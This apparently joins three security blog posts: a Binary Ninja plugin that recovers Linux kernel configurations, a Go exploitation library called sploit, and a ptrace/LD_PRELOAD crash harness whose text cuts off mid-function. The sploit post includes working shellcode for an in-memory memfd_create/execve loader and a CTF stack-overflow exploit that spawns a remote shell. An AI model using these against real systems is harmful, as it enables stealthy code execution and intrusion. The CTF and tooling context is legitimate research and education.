Automated RE of Kernel Configurations

Kconfig (short for kernel configuration) is a component of the Kbuild build system for the Linux kernel. The Linux kernel is highly customizable, and a configuration is required to build the kernel and generate kernel headers. In this blog post, I introduce a new Binary Ninja plugin that analyzes Linux kernel binaries to recover kernel configuration options.

There are many reasons one might need to recover a Linux kernel configuration after the kernel has been built. My motivation for this project is to make it easier to generate kernel headers for building loadable kernel modules (LKMs) that will load on target Linux devices where source isn’t available. Linux has multiple mechanisms that verify LKMs at load time to ensure they are compatible and won’t destabilize the kernel. By recovering a kernel’s build configuration, the kernel can be rebuilt from upstream source and compatible kernel headers can be generated. These headers can then be used to build LKMs that will [hopefully] load on the target device.

Intro to Kconfig

Kbuild is the Linux kernel build system. It primarily exists to parse the Kconfig macro language and set the proper flags (based on the user-provided configuration options) during the build. Under the hood, it uses GNU make. The first step when building Linux is to create the .config file, which holds the configuration. During the build, these options are used to set C preprocessor definitions, define symbols, and more. A more thorough explanation of the kernel build process can be found here. The rest of this section focuses solely on the format of the generated .config file.

Linux build configuration begins by specifying the architecture of the platform the kernel is intended to run on. Kbuild then processes the corresponding Kconfig file, which is written in a custom macro language that tells Kbuild which configuration options to set automatically and which to ask the user to set. Tools like menuconfig build a tree-like menu from it that the user can navigate to change options. After all the options are supplied, the .config file is generated. This is a text file that resembles the following format:

#
# Automatically generated file; DO NOT EDIT.
# Linux/x86 4.19.208 Kernel Configuration
#

#
# Compiler: gcc-8 (Debian 8.3.0-6) 8.3.0
#
CONFIG_CC_IS_GCC=y
CONFIG_GCC_VERSION=80300
CONFIG_CLANG_VERSION=0
CONFIG_CC_HAS_ASM_GOTO=y
CONFIG_IRQ_WORK=y
CONFIG_BUILDTIME_EXTABLE_SORT=y
CONFIG_THREAD_INFO_IN_TASK=y

#
# General setup
#
CONFIG_INIT_ENV_ARG_LIMIT=32
# CONFIG_COMPILE_TEST is not set
CONFIG_LOCALVERSION=""
# CONFIG_LOCALVERSION_AUTO is not set
CONFIG_BUILD_SALT="4.19.0-18-amd64"
...

Reverse Engineering Configuration Options

Most configuration options can be recovered by analyzing the Linux kernel binary post-build. Doing this manually is tedious and time-intensive, depending on how many options you need to reverse engineer. This section describes how to reverse a config option manually, and how the Binary Ninja API can be leveraged to do it for you.

The first option I will use for demonstration is the CONFIG_BUILD_SALT configuration. By looking at the upstream Linux kernel source code we can determine that the CONFIG_BUILD_SALT is used to define the utsname version member. The source code also indicates that the sched_debug_header function supplies the utsname version string as the fourth argument for a call to seq_printf.

static void sched_debug_header(struct seq_file *m)
{
	u64 ktime, sched_clk, cpu_clk;
	unsigned long flags;

	local_irq_save(flags);
	ktime = ktime_to_ns(ktime_get());
	sched_clk = sched_clock();
	cpu_clk = local_clock();
	local_irq_restore(flags);

	SEQ_printf(m, "Sched Debug Version: v0.11, %s %.*s\n",
		init_utsname()->release,
		(int)strcspn(init_utsname()->version, " "),
		init_utsname()->version);

By locating and analyzing sched_debug_header in the Linux kernel binary, we can see that it corresponds to the code in the upstream kernel source, and conclude that the fourth argument in the call to seq_printf is indeed a pointer to the utsname version string.

sched_debug_header call to seq_printf

If we were doing this manually, we would open our config file in a text editor and type CONFIG_BUILD_SALT="4.19.0-18-amd64". Instead, we’re going to use the Binary Ninja API to automate this by writing code that takes the following steps:

  1. Locate the sched_debug_header function
  2. Iterate through the function’s HLIL instructions to locate the first call to seq_printf
  3. Get the fourth argument for the call to seq_printf and verify that it is a pointer
  4. Get the string that the pointer is pointing to (the build version)
    # Module-level imports assumed: logging, typing.Optional and
    # binaryninja.enums.HighLevelILOperation. to_ulong() is assumed to be a
    # plugin helper that converts an HLIL constant to an unsigned integer.
    def _recover_config_build_salt(self) -> Optional[str]:
        syms = self.bv.get_symbols_by_name('sched_debug_header')
        if not syms:
            logging.error('Failed to lookup sched_debug_header')
            return None

        sched_debug_header = self.bv.get_function_at(syms[0].address)
        if not sched_debug_header:
            logging.error('Failed to get function sched_debug_header')
            return None

        syms = self.bv.get_symbols_by_name('seq_printf')
        if not syms:
            logging.error('Failed to lookup seq_printf')
            return None
        seq_printf_addr = syms[0].address

        # Walk the HLIL and stop at the first direct call to seq_printf
        for block in sched_debug_header.high_level_il:
            for instr in block:
                if instr.operation != HighLevelILOperation.HLIL_CALL:
                    continue

                if instr.dest.operation != HighLevelILOperation.HLIL_CONST_PTR:
                    continue

                if to_ulong(instr.dest.constant) != seq_printf_addr:
                    continue

                if len(instr.params) < 3:
                    logging.error(
                        'seq_printf call in sched_debug_header has too few params')
                    return None

                # The string argument must be a constant pointer into the binary
                if instr.params[
                        2].operation != HighLevelILOperation.HLIL_CONST_PTR:
                    logging.error(
                        'param3 of seq_printf call is not a pointer')
                    return None

                s = self.bv.get_ascii_string_at(
                    to_ulong(instr.params[2].constant))
                if not s:
                    logging.error('Failed to get build salt string')
                    return None

                return s.value

        logging.error('No call to seq_printf found in sched_debug_header')
        return None

Thankfully, not all configuration options require analyzing code. Many can be determined from the presence of a symbol for an exported function or global data variable. An example of this type of option is CONFIG_TICK_ONESHOT. Looking at the upstream Linux source code, we can see that a Makefile uses this option to decide whether to include the tick-broadcast-hrtimer.o object file in the kernel build.

obj-$(CONFIG_GENERIC_CLOCKEVENTS)		+= clockevents.o tick-common.o
ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y)
 obj-y						+= tick-broadcast.o
 obj-$(CONFIG_TICK_ONESHOT)			+= tick-broadcast-hrtimer.o
endif

This means that if any symbols defined in tick-broadcast-hrtimer.c are present in the resulting kernel build, then CONFIG_TICK_ONESHOT is set. Elsewhere in the same Makefile, tick-oneshot.o is likewise built only when CONFIG_TICK_ONESHOT is set, and tick-oneshot.c defines the function tick_program_event, which makes that symbol a convenient indicator. By writing code around the BN API, we can automate recovery of this option:

    def _set_if_symbol_present(self, name: str) -> ConfigStatus:
        if self.bv.get_symbols_by_name(name):
            return ConfigStatus.SET
        # NOT_SET is an assumed member name of the plugin's ConfigStatus enum
        return ConfigStatus.NOT_SET

    def _recover_config_tick_oneshot(self) -> ConfigStatus:
        return self._set_if_symbol_present('tick_program_event')

The code above attempts to look up the tick_program_event symbol. If the lookup fails, CONFIG_TICK_ONESHOT is not set; if it succeeds, it is set. There are many types of configuration options. A large portion of them can be knocked out using the symbol lookup method, while others require analyzing code, data structures, and more.

What about /proc/config.gz?

RE of the kernel binary is not always necessary to recover the Linux kernel configuration. Sometimes kernels are built with the following configuration options:

CONFIG_IKCONFIG=y
CONFIG_IKCONFIG_PROC=y

Kernels built with “in-kernel configuration support” contain the kernel configuration file in the kernel binary. With CONFIG_IKCONFIG_PROC, the configuration is also exposed to user space at /proc/config.gz on the running system. In this scenario, config.gz can be copied off the device and used to reproduce the build. However, in my experience most distributed Linux kernels aren’t built with these options, which is why it is often necessary to resort to RE.

Introducing bn-kconfig-recover

I have released a Binary Ninja plugin, bn-kconfig-recover, that automates recovery of kernel configuration options. Currently, it can recover configuration options for general setup, the IRQ subsystem, the timer subsystem, and CPU/task time and stats accounting. To use the plugin, create a Binary Ninja database (BNDB) for the kernel, populated with symbols for exports from the kernel symbol table. The datavars branch of my bn-kallsyms plugin can help apply symbols from /proc/kallsyms. Other methods for applying symbols exist as well (see the vmlinux-to-elf project). After creating the kernel BNDB, run the bn_kconfig_recover.py script headless, supplying the path to the kernel BNDB and the path for the output config file.

Once it is complete, it will create a configuration file containing entries for all supported configuration options.

Plugin Limitations

There are a few limitations to this plugin. First, the plugin is not complete: there are thousands of Linux configuration options, and adding support for all of them is a work in progress. I plan to continue adding support for more options one subsystem at a time, and I will gladly accept pull requests from community contributors. Limitations of the approach itself include:

  • Many of the configuration options are dependent on symbols. The Linux kernel must provide symbols for exported functions and data variables in the kernel symbol table to support loading LKMs. However, if the kernel is built without LKM support (like Android kernels), the kernel doesn’t need to provide symbols and is built without a kernel symbol table. In this scenario, symbols required by bn-kconfig-recover would need to be applied manually in the BNDB. Depending on your use-case this could be a non-starter.
  • There are many kernel versions. This plugin has only been tested on 4.* kernels for x86-64; development was done using a 4.19 kernel. As development progresses, I will likely need to change option-specific heuristics to support multiple kernel versions and architectures. For now, there may be false positives when running the plugin on newer 5.* or older (< 3.*) kernels.
  • Not all kernel developers follow the rules. Engineering teams often make proprietary modifications to the Linux source code, which can cause recovery of certain config options to be inaccurate.

Conclusion

Recovering Linux kernel configurations is one example of many tedious reverse engineering tasks that can be automated. I believe this is a worthwhile pursuit that can aid in many scenarios, including LKM development, kernel exploit development, and interface compatibility development. My Binary Ninja plugin can be found here. If you are interested in this tool, feel free to follow the project, submit issues, and contribute pull requests. Thanks for reading!

Sploit – Binary Analysis and Exploitation with Go

Sploit is a Go package that aids in binary analysis and exploitation. In this blog post, I describe some of the core features of sploit and how it can be used for capture the flag (CTF) competitions as well as practical reverse engineering and exploit development.

Introduction to Sploit

I decided to create sploit to invest in an open-source framework that isn’t built on top of commercial software but provides a powerful headless API for automating reverse engineering and exploit development tasks. The current release (v0.1.0) includes the following features:

  • ELF interface that provides the ability to parse ELF files and access data by virtual address
  • Capstone integration for disassembling machine code
  • Assembly interface for compiling assembly to machine code (backed by GNU toolchain)
  • ROP interface that supports filters to aid in locating specific gadgets
    • Currently, x86-64 and x86 only
  • Pack/unpack methods for more easily converting between byte slices and integer types
  • Remote interface that provides helpers for socket communication
  • Shellcode sub-package that uses JIT-compilation to emit configured exploit payloads
  • Support for ARM, AArch64, PPC, MIPS, x86, and x86-64 CPU architectures

Why Go?

This project is undeniably inspired by other frameworks such as pwntools and angr that are predominantly written in Python. Python has taken over the reverse engineering world, understandably so. It is a powerful, high-level language that is easy to work with and excellent for rapid prototyping, a trait that is especially important for exploit development. I’ve come to accept that whether it’s an IDA plugin, GDB script, or some recipe to automate a task, I’ll likely spend a small percentage of my time writing Python for the foreseeable future. However, coming from an embedded C background, I have never been a Python fan. I don’t like dynamic typing, concurrency and Unicode support were afterthoughts, and Python programs are comparatively slower and less efficient than programs written in other modern languages.

Over the years, I have experimented with many Python alternatives. I wrote packages for the Julia language and tried JVM-based languages such as Scala and Clojure. About a year ago, I decided to learn Go. While I’ve found things I dislike about the language, it is the first high-level language I’ve truly enjoyed using. Like Python, it has a large standard library and is heavily adopted. Unlike Python, it has excellent support for concurrency, is statically typed, and can be cross-compiled to run on over 15 different CPU architectures. Its struct support and extensive set of numeric types make it especially well suited to security engineering, where it’s common to work with binary file and wire formats. For these reasons, I chose Go for sploit.

ELF Analysis

Go’s standard library contains a debug/elf package for handling ELF object files. Sploit’s ELF interface is built on top of it and acts as an abstraction layer, providing higher-level methods that use virtual addresses (VAs) to operate on data in ELF segments. The ELF API includes methods for data access and type transformations, binary signature searches, and code disassembly. The following example demonstrates locating and disassembling the _start routine in an ELF executable. It shows how the underlying debug/elf object is preserved and exported through sploit, so we can use the lower-level APIs to access the ELF header directly and query e_entry. The example passes e_entry through OffsetToAddr before disassembling; note that per the ELF specification e_entry already holds a virtual address, and for a typical position-independent executable, whose first loadable segment maps file offset 0 to address 0, the two values coincide. For brevity, I’ve chosen to omit error handling.

package main

import (
    "fmt"
    sp "github.com/zznop/sploit"
)

func main() {
    elf, _ := sp.NewELF("prog")
    entry, _ := elf.OffsetToAddr(elf.E.Entry)
    instrs, _ := elf.Disasm(entry, 42)
    fmt.Printf("_start  :\n%s", instrs)
}
> ./startdis 
_start  :
00001050: xor ebp, ebp
00001052: mov r9, rdx
00001055: pop rsi
00001056: mov rdx, rsp
00001059: and rsp, 0xfffffffffffffff0
0000105d: push rax
0000105e: push rsp
0000105f: lea r8, [rip + 0x15a]
00001066: lea rcx, [rip + 0xf3]
0000106d: lea rdi, [rip + 0xc1]
00001074: call qword ptr [rip + 0x2f66]

Assembly Compilation

Sploit is backed by the GNU toolchain and exposes an API that leverages the GNU Assembler (GAS) to just-in-time (JIT) compile assembly instructions to machine code. This can be used directly to write shellcode from scratch or indirectly through sploit’s higher-level shellcode sub-package. The following example demonstrates compiling x86-64 assembly and dumping the machine code.

package main

import (
    "encoding/hex"
    "fmt"

    "github.com/zznop/sploit"
)

func main() {
    instrs := "mov rcx, r12\n"              +
              "mov rdx, r13\n"              +
              "mov r8, 0x1f\n"              +
              "xor r9, r9\n"                +
              "sub rsp, 0x8\n"              +
              "mov qword [rsp+0x28], rax\n"

    arch := &sploit.Processor{
        Architecture: sploit.ArchX8664,
        Endian:       sploit.LittleEndian,
    }

    opcode, _ := sploit.Asm(arch, instrs)
    fmt.Printf("Opcode bytes:\n%s\n", hex.Dump(opcode))
}
> ./assemble_example
Opcode bytes:
00000000  4c 89 e1 4c 89 ea 49 c7  c0 1f 00 00 00 4d 31 c9  |L..L..I......M1.|
00000010  48 83 ec 08 48 89 44 24  28                       |H...H.D$(|

On the backend, sploit writes an assembly file, prog.S, to /tmp containing the instructions passed to Asm() and shells out to GCC to assemble it into a position-independent object file (using the -c and -fpic flags). After building prog.o, sploit shells out to objcopy to dump only the .text section to prog.bin, then reads prog.bin and returns its contents as a byte slice. The template for prog.S is shown below:

.section .text
.global _start
.intel_syntax noprefix
_start:
    // Input instructions get copied here
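The pipeline described above can be sketched with Go’s os/exec package. This is a minimal illustration, not sploit’s code: it assumes gcc and objcopy are on the PATH and target the host architecture (other architectures would need a cross toolchain), and buildSource and assemble are hypothetical names. One deliberate difference is that each call uses its own temporary directory instead of a fixed /tmp/prog.S, so concurrent calls cannot overwrite each other’s files.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
)

// asmTemplate mirrors the prog.S template shown above.
const asmTemplate = ".section .text\n.global _start\n.intel_syntax noprefix\n_start:\n"

// buildSource appends the caller's instructions to the template.
func buildSource(instrs string) string {
	return asmTemplate + instrs + "\n"
}

// assemble runs gcc and objcopy in a fresh temporary directory and returns
// the raw bytes of the .text section.
func assemble(instrs string) ([]byte, error) {
	dir, err := os.MkdirTemp("", "asm")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(dir)

	src := filepath.Join(dir, "prog.S")
	obj := filepath.Join(dir, "prog.o")
	bin := filepath.Join(dir, "prog.bin")
	if err := os.WriteFile(src, []byte(buildSource(instrs)), 0o600); err != nil {
		return nil, err
	}
	steps := [][]string{
		{"gcc", "-c", "-fpic", src, "-o", obj},
		{"objcopy", "-O", "binary", "--only-section=.text", obj, bin},
	}
	for _, s := range steps {
		if out, err := exec.Command(s[0], s[1:]...).CombinedOutput(); err != nil {
			return nil, fmt.Errorf("%s: %v: %s", s[0], err, out)
		}
	}
	return os.ReadFile(bin)
}

func main() {
	code, err := assemble("xor rax, rax\nret")
	if err != nil {
		fmt.Println("assembly failed:", err)
		return
	}
	fmt.Printf("% x\n", code)
}
```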

Shellcoding

Shellcoding can be done by using sploit’s Asm() method directly or through sploit’s shellcode sub-package, which provides higher-level interfaces for constructing configured payloads that carry out generic tasks such as executing /bin/sh. As a surrogate payload for designing the shellcode interface, I chose to integrate my x86-64 Linux loader, which can be prepended to any ELF executable or bash script to allow it to run in memory as an exploit payload. I named the method LinuxMemFdExec. It takes a single argument: a byte slice containing the executable that should run as the final payload. LinuxMemFdExec compiles the stub assembly by calling Asm(), which returns a byte slice containing the unconfigured shellcode. It then patches executable_size with the size of the payload and appends the payload bytes. The result is a byte slice containing the configured shellcode.

// LinuxMemFdExec constructs a payload to run the supplied executable in an anonymous file descriptor
func (x8664 *X8664) LinuxMemFdExec(payload []byte) ([]byte, error) {
	instrs := `
jmp past

executable_size: .quad 0x4141414141414141   /* fixed up with size of executable */
fd_name: .byte 0                            /* empty file descriptor name */
fd_path: .ascii "/proc/self/fd/\0\0\0\0\0"  /* path to file descriptor for exec call */

past:
    mov rax, 319                            /* __NR_memfd_create syscall num */
    lea rdi, [rip+fd_name]                  /* ptr to empty file descriptor name */
    mov rsi, 1                              /* MFD_CLOEXEC (close file descriptor on exec) */
    syscall                                 /* create anonymous fd */
    test rax, rax                           /* good file descriptor? */
    js done                                 /* return if bad file descriptor */
    mov rdi, rax                            /* file descriptor (arg_0) */
    mov rax, 1                              /* __NR_write */
    lea rsi, [rip+executable]               /* pointer to executable base (arg_1) */
    mov rdx, qword [rip+executable_size]    /* load size of executable into rdx (arg_2) */
    syscall                                 /* write the executable to the fd */
    cmp rax, rdx                            /* did everything get written successfully? */
    jnz done                                /* fail out if all bytes were not written */
    call fixup_fd_path                      /* fixup the fd path string by converting the fd to a str */
    mov rax, 59                             /* execve syscall num */
    lea rdi, [rip+fd_path]                  /* filename */
    xor rcx, rcx                            /* zeroize rcx (terminator for argv) */
    push rcx                                /* push 0 to stack */
    push rdi                                /* push address of fd path to the stack */
    mov rsi, rsp                            /* argv (address of fd path, null) */
    xor rdx, rdx                            /* envp = NULL */
    syscall                                 /* call execve (won't return if successful) */
    add rsp, 16                             /* restore the stack */
done:
    ret                                     /* return */

/*
 * fixup the fd path string with the file descriptor -
 * basically sprintf(foo, "/proc/self/fd/%i", fd)
 */

fixup_fd_path:
    mov rax, rdi                            /* number to be converted */
    mov rcx, 10                             /* divisor */
    xor bx, bx                              /* count digits */
.divide:
    xor rdx, rdx                            /* high part = 0 */
    div rcx                                 /* rax = rdx:rax/rcx, rdx = remainder */
    push dx                                 /* dx is a digit in range [0..9] */
    inc bx                                  /* count digits */
    test rax, rax                           /* rax is 0? */
    jnz .divide                             /* no, continue */

    /* pop digits from stack in reverse order */
    mov cx, bx                              /* number of digits */
    lea rsi, [rip+fd_path]                  /* rsi points to fd path string buffer */
    add rsi, 14                             /* start of location to write the fd (as a string) */
.next_digit:
    pop ax
    add al, '0'                             /* convert to ASCII */
    mov [rsi], al                           /* write it to the buffer */
    inc rsi                                 /* advance to the next output byte */
    loop .next_digit
    ret

/* appended script or ELF executable */
executable:
`
	unconfigured, err := sp.Asm(x8664.arch, instrs)
	if err != nil {
		return nil, err
	}

	size := sp.PackUint64LE(uint64(len(payload)))
	configured := bytes.Replace(unconfigured, []byte{0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41}, size, 1)
	configured = append(configured, payload...)
	return configured, nil
}

ROP Gadget Searching

Sploit can be used to write programs that locate gadgets for return-oriented programming (ROP), which is useful for exploit development. Sploit currently contains limited functionality for searching for specific gadgets using filters (regular expressions). The following example demonstrates how sploit can be used to find and display all gadgets containing a “pop rbp” substring.

package main

import (
    "github.com/zznop/sploit"
)

var program = "../test/prog1.x86_64"

func main() {
    elf, _ := sploit.NewELF(program)
    rop, _ := elf.ROP()

    matched, _ := rop.InstrSearch("pop rbp")
    matched.Dump()
}
0000111f: pop rbp ; ret
0000111d: add byte ptr [rcx], al ; pop rbp ; ret
00001118: mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
00001113: call 0x1080 ; mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
000011b7: pop rbp ; pop r14 ; pop r15 ; ret
000011b3: pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011b2: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011af: add esp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011ae: add rsp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

InstrSearch() returns a ROP type, which can be iterated over to access the underlying Gadget structures. From the Gadget structure you can query the virtual address, instruction text, and opcode bytes.
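Because the filters are regular expressions, they can be more specific than a plain substring. The sketch below shows the general filtering idea with Go’s regexp package over a hypothetical Gadget record; the type and its field names are illustrative and are not taken from sploit’s Gadget type.

```go
package main

import (
	"fmt"
	"regexp"
)

// Gadget is a hypothetical record; field names are illustrative.
type Gadget struct {
	Address uint64
	Instrs  string
	Opcode  []byte
}

// filterGadgets keeps the gadgets whose instruction text matches pattern.
func filterGadgets(gadgets []Gadget, pattern string) ([]Gadget, error) {
	re, err := regexp.Compile(pattern)
	if err != nil {
		return nil, err
	}
	var out []Gadget
	for _, g := range gadgets {
		if re.MatchString(g.Instrs) {
			out = append(out, g)
		}
	}
	return out, nil
}

func main() {
	gadgets := []Gadget{
		{0x111f, "pop rbp ; ret", []byte{0x5d, 0xc3}},
		{0x11b2, "pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret", nil},
		{0x1000, "xor eax, eax ; ret", []byte{0x31, 0xc0, 0xc3}},
	}
	// Anchored pattern: only gadgets that begin with "pop rbp".
	matched, err := filterGadgets(gadgets, `^pop rbp\b`)
	if err != nil {
		panic(err)
	}
	for _, g := range matched {
		fmt.Printf("%08x: %s\n", g.Address, g.Instrs)
	}
}
```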

Solving a CTF Challenge

Sploit has many other features not covered in this blog post. For brevity, I’ll demonstrate some of the remaining core features by solving a CTF challenge: a simple stack overflow pwnable that I found online. I’ve provided a screenshot of the assembly below.

Pwnable CTF Challenge Instructions

The challenge starts by pushing 20 bytes of ASCII (“Let’s start the CTF:”) onto the stack and writing them to stdout. It then reads 60 bytes onto the stack beginning at var_1c. From var_1c there are only 20 bytes of space until the return address, so we can overflow the buffer and overwrite the return address. For this challenge, the stack is executable. We’ll exploit this program by writing a Go solution around sploit that completes the following steps:

  1. Send 20 junk bytes followed by an address (0x08048087) that overwrites the return address and triggers an info leak. This causes the write syscall to run twice. The second time it runs, the stack frame will have been reset, causing it to write a stack pointer to stdout.
  2. Extract the leaked stack address and construct a second buffer that overflows the return address again, this time returning to our payload. Note: after the write syscall leaks the stack address, the program blocks on the read syscall.
package main

import (
    sp "github.com/zznop/sploit"
)

var arch = &sp.Processor{
    Architecture: sp.ArchI386,
    Endian:       sp.LittleEndian,
}

var scInstrs = `mov al, 0xb   /* __NR_execve */
                sub esp, 0x30 /* Get pointer to /bin/sh (see below) */
                mov ebx, esp  /* filename (/bin/sh) */
                xor ecx, ecx  /* argv (NULL) */
                xor edx, edx  /* envp (NULL) */
                int 0x80`

func main() {
    shellcode, _ := sp.Asm(arch, scInstrs)
    r, _ := sp.NewRemote("tcp", "some.pwnable.online:10800")
    defer r.Close()
    r.RecvUntil([]byte("CTF:"), true)

    // Leak a stack address
    r.Send(append([]byte("/bin/sh\x00AAAAAAAAAAAA"), sp.PackUint32LE(0x08048087)...))
    resp, _ := r.RecvN(20)
    leakAddr := sp.UnpackUint32LE(resp[0:4])

    // Pop a shell
    junk := make([]byte, 20-len(shellcode))
    junk = append(junk, sp.PackUint32LE(leakAddr-4)...)
    r.Send(append(shellcode, junk...))
    r.Interactive()
}

The first feature worth mentioning in the solution code is sploit’s Remote interface. With the call to NewRemote, sploit establishes a TCP session with the server running on port 10800 at some.pwnable.online (I’ve redacted the real hostname). Then, using the RecvUntil method, it receives data until it sees “CTF:”. The second feature worth mentioning is sploit’s pack/unpack interface (see the call to PackUint32LE). These helpers reduce the amount of code required to pack integer types into byte slices compared with the binary.LittleEndian.PutUint* functions, which require the destination buffer to be allocated before the call. Many other features used by the solution, such as the payload JIT compilation, have been demonstrated already. The last feature I’d like to point out is the call to remote.Interactive. The Interactive method provides asynchronous I/O and forwards user input over the TCP session. In this example, it is used to interact with the remote shell.
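For comparison, the sketch below shows what such a helper looks like when written directly against encoding/binary. packUint32LE and unpackUint32LE are hypothetical helpers in the spirit of sploit’s PackUint32LE and UnpackUint32LE, not their actual source. Since Go 1.19, binary.LittleEndian.AppendUint32 also appends to an existing slice without a separate allocation step.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// packUint32LE returns a freshly allocated 4-byte little-endian encoding of v.
func packUint32LE(v uint32) []byte {
	b := make([]byte, 4)
	binary.LittleEndian.PutUint32(b, v)
	return b
}

// unpackUint32LE decodes a little-endian uint32 from the first 4 bytes of b.
func unpackUint32LE(b []byte) uint32 {
	return binary.LittleEndian.Uint32(b)
}

func main() {
	// 20 bytes of filler followed by the overwritten return address.
	buf := append([]byte("/bin/sh\x00AAAAAAAAAAAA"), packUint32LE(0x08048087)...)
	fmt.Printf("% x\n", buf[20:])

	// Go 1.19+: append the encoded value in place.
	buf2 := binary.LittleEndian.AppendUint32([]byte("/bin/sh\x00AAAAAAAAAAAA"), 0x08048087)
	fmt.Println(string(buf) == string(buf2))
}
```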

Conclusion

Many of sploit’s core features will be familiar to anyone who has used pwntools; much of the core functionality is based on my own experience using pwntools and other Python-based frameworks. As the core becomes more stable, I intend to focus on analysis features rather than the remote interfaces and CTF workflow enhancements. In the future, I plan to incorporate an emulation engine, possibly usercorn, and begin adding APIs for dynamic analysis. I also hope to integrate an intermediate language and expand the disassembly interface to do basic CFG recovery. My end goal is to produce a widely adopted Go-based framework for headless, automated reverse engineering and exploit development in cloud-based or continuous integration (CI) applications.

Crash Harnessing with Injected Code

There are many approaches to harnessing programs and instrumenting them for crash analysis and memory profiling, and each technique has benefits and drawbacks. Emulation is often the most reliable method but requires the largest sacrifice in performance. Specialized hardware, such as modern Intel processors, can provide code coverage but doesn’t necessarily provide the ability to profile memory or monitor heap usage. There are also more advanced techniques, such as binary recompilation using frameworks like McSema/Remill and Egalito, which lift compiled code to an intermediate representation, apply instrumentation, and recompile. In this blog post, I describe a simple alternative: a proof-of-concept that harnesses a target program and adds basic instrumentation using a combination of ptrace-based techniques and code injection to profile memory and monitor for crashes. The end result is a crash harness and an injected shared object that hooks imported functions to profile dynamic memory and detect conditions such as heap buffer overflows and use-after-free.

Ich Crash Harness Stack Overflow Detection

Process Trace and LD_PRELOAD

Before diving into implementation details, I’d like to describe the ptrace system call and the LD_PRELOAD trick, two Linux features I based my design around. ptrace (process trace) is a Linux system call that aids in debugging a running process; the best-known software that uses it is the GNU Debugger (GDB). ptrace allows a tracer to attach to another process to trap system calls, write to its virtual memory, change register values, and more. LD_PRELOAD is an environment variable that instructs the Linux dynamic linker to load the specified shared object before all other libraries. An example of software that abuses the LD_PRELOAD trick is the Jynx rootkit.

Writing a Crash Harness

I started by developing a simple crash harness for x86-64 executables. Like strace, you run the harness and the harness runs the target program. This is achieved by forking; the child process calls ptrace with PTRACE_TRACEME to request tracing by its parent before executing the target program. The parent process calls waitpid in a loop to monitor the child’s status.

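#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * init_crash_harness(), spawn_process(), monitor_execution() and
 * display_crash_dump() are defined elsewhere in the harness.
 */
int main(int argc, char **argv)
{
    pid_t pid;

    if (argc < 2) {
        printf("./ich [cmd]\n");
        return 1;
    }

    if (init_crash_harness())
        return 1;

    pid = fork();
    if (pid < 0) {
        perror("fork");
        return 1;
    }

    if (pid == 0) {
        /* Child: this won't return */
        spawn_process(&argv[1]);
    } else {
        /* Parent: dump state when monitor_execution() reports a crash (0) */
        if (!monitor_execution(pid)) {
            display_crash_dump(pid);
        }
        ptrace(PTRACE_DETACH, pid, 0, 0);
    }

    return 0;
}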

If waitpid reports that the child stopped with SIGSEGV, the parent creates a crash dump displaying register values and virtual memory content. It also locates and dumps the base of the ELF image by reading backward from rip toward lower addresses with PTRACE_PEEKDATA until it finds the ELF header signature. The crash monitoring functionality is not unlike that of many other Linux crash harnesses.

LD_PRELOAD Code Injection

After writing the core of the crash harness, I focused on adding functionality to inject a shared object into the target program at runtime using the LD_PRELOAD trick. This trick is fairly simple and can be carried out from bash with a command similar to the line below.

$ export LD_PRELOAD=/path/to/sauce.so && ./some_program

To avoid defining the LD_PRELOAD environment variable manually on each run, the harness appends LD_PRELOAD to a copy of environ (its own environment) that it passes to the target, and it embeds the shared object in the harness binary using .incbin. When the harness runs, it writes the shared object (described in the next section) to disk at a temporary path. The harness code that spawns the target process is below.

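extern char **environ;

static void spawn_process(char **argv)
{
    char **env = NULL;
    char preload_env[256];
    size_t i = 0;

    /* Build "LD_PRELOAD=<path to the hook library>" (snprintf NUL-terminates) */
    snprintf(preload_env, sizeof(preload_env),
             "LD_PRELOAD=%s", HOOK_LIB_PATH);
    info("Setting up the environment: %s", preload_env);

    /* Count the harness's environment variables */
    while (environ[i] != NULL)
        i++;

    /* Room for the existing entries, LD_PRELOAD, and the NULL terminator */
    env = (char **)malloc((i + 2) * sizeof(char *));
    if (env == NULL) {
        err("Failed to allocate the environment");
        exit(1);
    }

    /* Copy the environment variables */
    i = 0;
    while (environ[i] != NULL) {
        env[i] = environ[i];
        i++;
    }

    /* Append LD_PRELOAD and terminate the array */
    env[i] = preload_env;
    env[i + 1] = NULL;

    info("Executing process (%s) ...\n", argv[0]);

    /* Ask to be traced by the parent, then stop so the parent
     * can observe the child before the target program starts */
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
        err("PTRACE_TRACEME failed");
        exit(1);
    }
    kill(getpid(), SIGSTOP);
    execve(argv[0], argv, env);

    /* execve only returns on failure */
    err("Failed to execute binary");
    exit(1);
}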
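Before spawn_process() runs, the embedded shared object has to be written to disk. The sketch below assumes the library bytes are available as a pointer and a length (in the real harness they would come from the .incbin'd blob; the hook_lib_start/hook_lib_end symbols in the comment are hypothetical) and uses mkstemp to pick a unique temporary path, whereas spawn_process() refers to a fixed HOOK_LIB_PATH. drop_payload is likewise a hypothetical name.

```c
#define _GNU_SOURCE  /* mkstemp, fdopen */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumption: the harness embeds the library with something like
 *   __asm__(".section .rodata\n"
 *           "hook_lib_start: .incbin \"hook.so\"\n"
 *           "hook_lib_end:\n"
 *           ".previous\n");
 * and passes hook_lib_start and (hook_lib_end - hook_lib_start) here.
 *
 * Writes data to a fresh temporary file and copies its path into
 * path_out. Returns 0 on success, -1 on failure. */
int drop_payload(const unsigned char *data, size_t len,
                 char *path_out, size_t path_len)
{
    char tmpl[] = "/tmp/ich_hook_XXXXXX";
    FILE *f;
    int fd, ok;

    if (path_len < sizeof(tmpl))
        return -1;

    fd = mkstemp(tmpl);  /* creates a unique file with mode 0600 */
    if (fd == -1)
        return -1;

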